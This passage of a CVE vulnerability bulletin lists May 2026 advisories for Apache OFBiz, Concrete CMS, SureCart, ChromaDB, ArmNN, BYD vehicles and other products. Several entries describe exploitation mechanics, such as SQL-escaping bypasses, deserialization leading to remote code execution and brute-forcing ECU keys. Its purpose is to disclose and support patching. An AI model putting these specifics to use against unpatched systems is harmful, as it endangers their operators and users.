| Apache Software Foundation–Apache OFBiz | Improper Access Control vulnerability in Apache OFBiz in multi-tenant deployments. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31388 | https://lists.apache.org/thread/npjchvnpnosoqpto46s2om12jd9s7py7 |
| Apache Software Foundation–Apache OFBiz | Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31906 | https://lists.apache.org/thread/1fblqdo89d3ps8kgtcnkcq8sh7gwkcpn |
| Apache Software Foundation–Apache OFBiz | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31909 | https://lists.apache.org/thread/0hpopzz1qrhkzsbt3ncofs6qo0545r2h |
| Apache Software Foundation–Apache OFBiz | Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31910 | https://lists.apache.org/thread/2smc4c4o056ovd2hoq1l29593y5y29vh |
| Apache Software Foundation–Apache OFBiz | Use of Hard-coded Cryptographic Key vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31986 | https://lists.apache.org/thread/2hl9xoqm8tq8b22x6vnmtp7tg3opcqgc |
| Apache Software Foundation–Apache OFBiz | Improper Control of Generation of Code (‘Code Injection’) vulnerability in email services of Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-35086 | https://lists.apache.org/thread/g0s37yhnh2xwfts400crb2w8s337hgjx |
| Apache Software Foundation–Apache OFBiz | Improper Neutralization of Special Elements used in an LDAP Query (‘LDAP Injection’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-41919 | https://lists.apache.org/thread/592czh9o69n74c036vy30fnqknocw74p |
| Apache Software Foundation–Apache OFBiz | Improper Authorization vulnerability in Apache OFBiz Webtools. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-45187 | https://lists.apache.org/thread/pcmfyxjyk7dg0btxqg9h7cr30yg8mr7k |
| Apache Software Foundation–Apache OFBiz | Improper Authentication vulnerability in Apache OFBiz via Password-Change Logic Flaw Leading to Remote Code Execution This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-45434 | https://lists.apache.org/thread/yw4owrzl0yho1yx7oqxvr6xjkmln9tq8 |
| Apache Software Foundation–Apache OFBiz | Improper Control of Generation of Code (‘Code Injection’), Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-46586 | https://lists.apache.org/thread/7mgjl81nrpxqtfcg6h5qtrx7wztbl4js |
| Apple–Private Cloud Compute Server Software | An attacker in a privileged network position may be able to leak sensitive information. A path handling issue was addressed with improved validation. This issue is fixed in PCC Release 5E290.3. | 2026-05-18 | not yet calculated | CVE-2026-20685 | https://security.apple.com/documentation/private-cloud-compute/releasenotes#darwin-init |
| APScheduler–JSONSerializer and CBORSerializer | The JSONSerializer and CBORSerializer in APScheduler (all versions including 3.10.x and 4.0.0a5) are vulnerable to Remote Code Execution (RCE) via Insecure Deserialization. The unmarshal_object function allows for arbitrary class instantiation and state injection by dynamically importing modules and calling __setstate__ on any class available in the Python environment. An attacker can exploit this by submitting a specially crafted JSON or CBOR payload to an application using these serializers | 2026-05-19 | not yet calculated | CVE-2026-31072 | https://github.com/agronholm/apscheduler https://gist.github.com/nedlir/11fb77f35a59cbba73392a086b02a9c6 |
| Arm–ArmNN | In Arm ArmNN through 2026-03-27, an integer overflow in TensorShape::GetNumElements() in armnn/Tensor.cpp allows a crafted TFLite model file to bypass buffer size validation and trigger a heap-based buffer over-read during model optimization. The overflow occurs when multiplying tensor dimensions using 32-bit unsigned arithmetic without overflow detection, causing GetNumBytes() to return an understated allocation size. During Optimize()->InferOutputShapes(), the BatchToSpaceNdLayer reads beyond the allocated buffer. | 2026-05-22 | not yet calculated | CVE-2026-42627 | https://github.com/ARM-software/armnn/blob/main/src/armnn/Tensor.cpp https://github.com/ARM-software/armnn/blob/main/src/armnnTfLiteParser/TfLiteParser.cpp |
| awesomemotive–NextGEN Gallery | NextGEN Gallery version prior to 4.2.1 are vulnerable to authenticated SQL injection via the ‘orderby’ parameter on the REST API endpoints ‘/imagely/v1/galleries’ and ‘/imagely/v1/albums’. The root cause is an insufficient sanitization function (‘_clean_column()’) in the data mapper layer that uses a character blacklist instead of a whitelist approach. This allows an authenticated attacker with the ‘NextGEN Gallery overview’ capability (assigned to the Administrator role by default) to inject arbitrary SQL into the ‘ORDER BY’ clause. | 2026-05-20 | not yet calculated | CVE-2026-9059 | https://www.tenable.com/security/research/tra-2026-42 |
| baptisteArno–typebot.io | TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain a critical stored XSS vulnerability in the app.typebot.io profile picture upload form. The application fails to sanitize or restrict SVG/XML-based uploads and directly renders them when accessed through the domain. By uploading a crafted malicious SVG file containing embedded JavaScript, an attacker will execute arbitrary JavaScript code. This vulnerability directly enables stored XSS exploitation because the payload is persistently stored on your infrastructure (app.typebot.io) and accessible from a public-facing, permanent link. Stored XSS via malicious SVG uploads to app.typebot.io allows attackers to execute arbitrary JavaScript in victims’ browsers, enabling session/token theft, account takeover, and exfiltration of sensitive user data. This issue has been fixed in version 3.16.0. | 2026-05-22 | not yet calculated | CVE-2026-39970 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-jj87-c343-26vp https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| Best Practical–Request Tracker | Request Tracker is vulnerable to a reflected cross-site scripting (XSS) vulnerability via the “Page” parameter in GET requests. An attacker can craft a URL that, when opened, results in arbitrary JavaScript execution in the victim’s browser. This vulnerability affects versions from 5.0.4 up to 5.0.9 and from 6.0.0 up to 6.0.2. | 2026-05-21 | not yet calculated | CVE-2026-6841 | https://cert.pl/en/posts/2026/05/CVE-2026-6841 https://requesttracker.com/request-tracker/ https://docs.bestpractical.com/release-notes/rt/5.0.10 https://docs.bestpractical.com/release-notes/rt/6.0.3 |
| BillaBear–BillaBear | BillaBear (all versions prior to Jan 2026) contains a SQL Injection vulnerability in the EventRepository. User-controlled input from metric filter names and aggregation properties is directly interpolated into SQL queries using sprintf() without proper sanitization or identifier quoting. Although filter values are parameterized, the filter identifiers (keys) are not. An authenticated attacker with ROLE_ACCOUNT_MANAGER permissions can exploit this to execute arbitrary SQL commands. | 2026-05-19 | not yet calculated | CVE-2026-31069 | https://gist.github.com/nedlir/a50725b94650467f0593b8f4009ae19e https://github.com/BillaBear/billabear https://gist.github.com/nedlir/2377ba6e7fa2ad957210b52aa8e400d9 |
| brainstormforce–Surecart | SureCart version prior to 4.2.1 are vulnerable to authenticated SQL injection via multiple parameters (‘model_name’, ‘model_id’, ‘integration_id’, ‘provider’) on the REST API endpoint ‘/surecart/v1/integrations/{id}’. The root cause is a flawed escaping bypass in the query builder (‘wp-query-builder’). Values passed to the ‘where()’ method are only sanitized via ‘$wpdb->prepare()’ when they do **not** contain a dot (‘.’) or the WordPress table prefix (‘wp_’). By including a dot anywhere in the payload, an attacker completely bypasses the escaping logic and injects arbitrary SQL into the ‘WHERE’ clause, allowing full UNION-based extraction of the database. | 2026-05-20 | not yet calculated | CVE-2026-9065 | https://www.tenable.com/security/research/tra-2026-43 |
| Broadcom–Automic Automation | Execution with unnecessary privileges vulnerability in Broadcom Automic Automation Agent Unix on Linux x64, Linux Power 64 BE, Linux Power 64 LE, zLinux (zSeries), AIX, Solaris x64, Solaris Sparc 64 allows Privilege Escalation, Target Programs with Elevated Privileges. This issue affects Automic Automation: < 24.4.4 HF1. | 2026-05-19 | not yet calculated | CVE-2026-8370 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37512 |
| BYD–Atto3 | In BYD Atto3, an attacker can obtain an authentication key through Brute Force attack, which is permanently available. The authentication key enables flash to the Electronic Parking Break (EPB) and Supplemental Restoration System (SRS) related ECUs. | 2026-05-19 | not yet calculated | CVE-2025-61081 | https://www.notion.so/BYD-Atto3-26215fb6156c8000b338db3c2011f637?source=copy_link https://www.notion.so/CVE-2025-61081-26215fb6156c8000b338db3c2011f637 |
| Centralny Instytut Ochrony Pracy – Pastwowy Instytut Badawczy–STER | A SQL injection vulnerability has been identified in STER. Improper neutralization of input provided by user into multiple Search Filters allows for SQL Injection attacks. It allows an authenticated attacker to view sensitive data such as data belonging to other users, or any other data that the application itself is able to access This issue was fixed in version 9.5. | 2026-05-22 | not yet calculated | CVE-2026-25606 | https://cert.pl/posts/2026/05/CVE-2026-25606 https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480 |
| Centralny Instytut Ochrony Pracy – Pastwowy Instytut Badawczy–STER | Use of a weak password encoding algorithm in STER software allows the value of the password to be guessed after analyzing how passwords with known values are encoded. This issue was fixed in version 9.5. | 2026-05-22 | not yet calculated | CVE-2026-25607 | https://cert.pl/posts/2026/05/CVE-2026-25606 https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480 |
| Centralny Instytut Ochrony Pracy – Pastwowy Instytut Badawczy–STER | STER uses unencrypted TCP traffic to transmit data over the network. It allows an attacker to conduct a Man-In-The-Middle attack and obtain sensitive data such as passwords, personal data, or authentication tokens. This issue was fixed in version 9.5. | 2026-05-22 | not yet calculated | CVE-2026-25608 | https://cert.pl/posts/2026/05/CVE-2026-25606 https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480 |
| Chroma–ChromaDB | A pre-authentication, code injection vulnerability in version 1.0.0 or later of the ChromaDB Python project allows an unauthenticated attacker to run arbitrary code on the server by sending a malicious model repository and trust_remote_code set to true in the /api/v2/tenants/{tenant}/databases/{db}/collections endpoint. | 2026-05-18 | not yet calculated | CVE-2026-45829 | https://www.hiddenlayer.com/research/chromatoast-served-pre-auth https://github.com/chroma-core/chroma/issues/6717 |
| ClipBucket–ClipBucket v5 v.5.5.2 | An issue in ClipBucket v5 v.5.5.2 allows an attacker to execute arbitrary code via the Authentication interface, login page endpoint and HTTP response security headers components | 2026-05-22 | not yet calculated | CVE-2026-37470 | http://clipbucket.com https://medium.com/@arpit03sharma2003/cve-2026-37470-clickjacking-vulnerability-in-clipbucket-v5-leads-to-credential-theft-and-8415def7804a |
| CODESYS–Visualization | The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session. | 2026-05-21 | not yet calculated | CVE-2026-0393 | https://codesys.csaf-tp.certvde.com/.well-known/csaf/white/2026/advisory2026-07_vde-2026-052.json |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to unauthenticated file usage disclosure via missing permission check in the usage controller. Any unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID} with any file ID and receive a list of every page that references that file, including page IDs, handles, and full URLs. This includes pages that are otherwise restricted by permissions.The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.9 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Eldudareeno for reporting. | 2026-05-21 | not yet calculated | CVE-2026-6826 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | In Concrete CMS 9.5.0 and below, the submit_password() method in concrete/controllers/single_page/download_file.php allows unauthorized file access since downloading permission-restricted files bypasses the view_file permission check. Files without passwords can be downloaded and any user who knows a file’s password can download a password protected file regardless of whether they have permission to access the file. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Youssef Eid for reporting | 2026-05-21 | not yet calculated | CVE-2026-7879 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is subject to Insecure Direct Object Reference (IDOR) in the Express Entry Detail block via the exEntryID parameter. This IDOR leads to unauthorized access to all Express form submissions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7881 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to unauthorized file deletion due to an Inverted CSRF token check in the DeleteFile controller. The code throws an error when the token IS valid and proceeds with file deletion when the token is invalid or missing. This effectively disables CSRF protection for the file deletion endpoint, allowing cross-site request forgery attacks against users who have permission to edit conversation messages. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with a vector of CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Mandani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7882 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR in AddMessage/UpdateMessage via attachments[] parameter which can lead to file permission bypass. The `AddMessage` and `UpdateMessage` conversation controllers accept user-supplied file attachment IDs and load files directly via `$em->find(File::class, $attachmentID)` without checking per-file permissions (`canViewFile()`). A user who can post in any conversation can reference any file in the CMS file manager by its sequential ID, effectively bypassing the file permission system. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with a vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Mandani for reporting. if a site truly has private files, the owner should set up a private storage location https://documentation.concretecms.org/user-guide/editors-reference/dashboard/system-and-maintenance/files/file-storage-locations outside of the webroot so that permissions can be checked on view as well. That way, even if a authorized user attaches a file, or otherwise links to it, unauthorized users won’t be able to view the file. | 2026-05-21 | not yet calculated | CVE-2026-7886 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | For Concrete CMS 9.5.0 and below, OAuth 2.0 Authorization-Code Handler Bypasses Account Status. A user with uIsActive=0 (suspended, banned, terminated employee) can still authenticate via OAuth and receive valid API tokens. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N. Thanks 0x4c616e for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7887 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | In Concrete CMS 9.5.0 and below, the RSS Displayer block accepts a feed URL from any page editor and fetches it server-side without validation enabling redirect-to-internal bypasses. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.1 with a vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:L/VA:N/SC:L/SI:N/SA:N. | 2026-05-21 | not yet calculated | CVE-2026-7890 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below fails to sanitize path traversal sequences in the ptComposerFormLayoutSetControlCustomTemplate field when saving page type composer form layouts. An authenticated rogue administrator with composer form editing rights can exploit this to include arbitrary readable files on the server. Combined with the file uploader’s extension-only validation (which permits PHP code in files saved with image extensions like .png), this can result in authenticated remote code execution. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 9.4 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8134 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Remote Code Execution due to insecure deserialization occurring in the ExpressEntryList block controller. An rogue administrator with privileges to add blocks to an area can bypass the intended protection mechanism (_fromCIF === true), which normally restricts malicious inputs over form POST requests, by leveraging the REST API functionality. Because the REST API parses requests using json_decode(), the string “true” is evaluated as a strict PHP Boolean(true). This bypass allows the attacker to inject a malicious serialized payload into the block’s filterFields database column. The payload will subsequently be executed when the block’s data is viewed or edited by an administrator leading to complete server takeover (RCE).The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.9 with a vector of CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks Nguyá»…n Văn Thiện https://github.com/Thien225409 for reporting | 2026-05-21 | not yet calculated | CVE-2026-8135 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Stored XSS via external-link page cvName because updateCollectionAliasExternal bypasses being sanitized. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8139 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/install/download/<remoteId>. The download() method in concrete/controllers/single_page/dashboard/extend/install.php checks only the canInstallPackages() permission before fetching a remote marketplace package and writing it to the server’s DIR_PACKAGES directory. Because the endpoint is a state-changing GET route with no token enforcement, an attacker who can cause an authenticated administrator to visit a crafted page can force an arbitrary marketplace package to be downloaded. In order to be vulnerable, the victim must be passing canInstallPackages() and the site must be connected to the Concrete marketplace. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8140 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Stored XSS via OAuth integration name. The OAuth authorize template renders the integration name (admin-controlled) through Concrete’s t() translation helper as a sprintf-style format. The <strong>…</strong> wrap is built by PHP string interpolation before t() runs, so the integration name lands in the translated output as raw HTML. A rogue admin could potentially snoop on login submissions.The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8197 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below has Stored XSS on the height parameter. The controller does not validate or sanitize $height. Any user with editor privileges can inject malicious JavaScript that executes in the context of any visitor’s browser, potentially leading to session hijacking, credential theft, or other malicious actions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Alfin Joseph for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8203 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to authorization Bypass in the Calendar Event Frontend Dialog which can allow cross-calendar data disclosure. A public calendar block can be used as a pivot point to access private calendar data. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8204 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to authorization bypass in the Calendar Block since action_get_events does not check canView on the calendar which results in restricted event details being disclosed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks lalalala5678 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8205 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR combined with a missing authentication gate. The endpoint /ccm/system/dialogs/file/usage/{fID} accepts an integer file ID in the URL and returns internal site structure data (page IDs, versions, URL paths) to anyone who sends a GET request. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8236 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR. The `/ccm/frontend/conversations/message_detail` endpoint returns the full content of any conversation message. An unauthenticated attacker can enumerate all conversation messages, including messages from restricted pages, member-only areas, and the moderation queue. File attachments with download URLs are also exposed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Eldudareeno for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8237 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR. The ‘/ccm/frontend/conversations/message_page’ endpoint returns the full content of any conversation message. An unauthenticated attacker can enumerate all conversation messages, including messages from restricted pages, member-only areas, and the moderation queue. File attachments with download URLs are also exposed. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8238 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR. The ‘/ccm/frontend/conversations/get_rating’ endpoint confirms existence and returns rating score for any message by ID. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8239 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to unauthenticated page metadata disclosure across every page with a configured summary template, revealing the existence of private, draft, and restricted pages while leaking title, path, description, and author information. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8240 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Reflected XSS in Legacy Pagination via HTML attribute injection. ConcreteCoreLegacyPagination builds pagination links by raw-interpolating its $URL field into href=”” (<a href=”{$linkURL}” …>). Any authenticated admin or report viewer with access to `/dashboard/reports/forms/legacy` who clicks the crafted URL fires the payload in their session. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting | 2026-05-21 | not yet calculated | CVE-2026-8245 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS below 9.5.0 and below is vulnerable to password change without reauthorization and session-hardening bypass. The user-profile edit controller passes the entire raw POST array to UserInfo::update() without field whitelisting resulting in password change without requiring the current password and also resulting in registered users able to disable the per-user-IP-pinning in the session validator which is meant to detect hijacking. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 5.3 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks 0x4c616e for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8327 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR in surveys. To be vulnerable, a site would have to be configured in such a way that both public and private surveys are present on the site. An unauthenticated attacker can vote in the restricted survey by submitting the restricted optionID through the public survey’s endpoint. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Zer0daySec https://github.com/Zee99y for reporting | 2026-05-21 | not yet calculated | CVE-2026-8337 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to CSRF via BackendFile::approveVersion. Victim with edit_file_contents permission is CSRF’d into publishing an attacker-chosen previously-uploaded version (downgrade to an older version of a file, or activation of a co-editor’s unpublished version). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-22 | not yet calculated | CVE-2026-8340 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR + wrong-authorization-level in the Express association Reorder dialog. This can cause Cross-entity state tampering with view-only permission on one entry. To be affected, a website has to be using express and relying on express entity ordering. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Winston Crooker for reporting. | 2026-05-22 | not yet calculated | CVE-2026-8347 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to missing authorization in the bulk_user_assignment.php which can lead to privilege escalation to Administrative Group. Any authenticated user with access to the bulk user assignment dashboard page can add any user email to any group and can remove legitimate admins. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Vincent55 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8350 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS–Concrete CMS | Concrete CMS version 9.0 to 9.5.0 is vulnerable to Stored XSS via page name in the Atomik theme. A rogue editor can inject arbitrary JavaScript that executes in the context of any authenticated user visiting the affected account pages. This can lead to session hijacking, credential theft, malicious actions performed on behalf of users, and potential privilege escalation. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-22 | not yet calculated | CVE-2026-8353 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
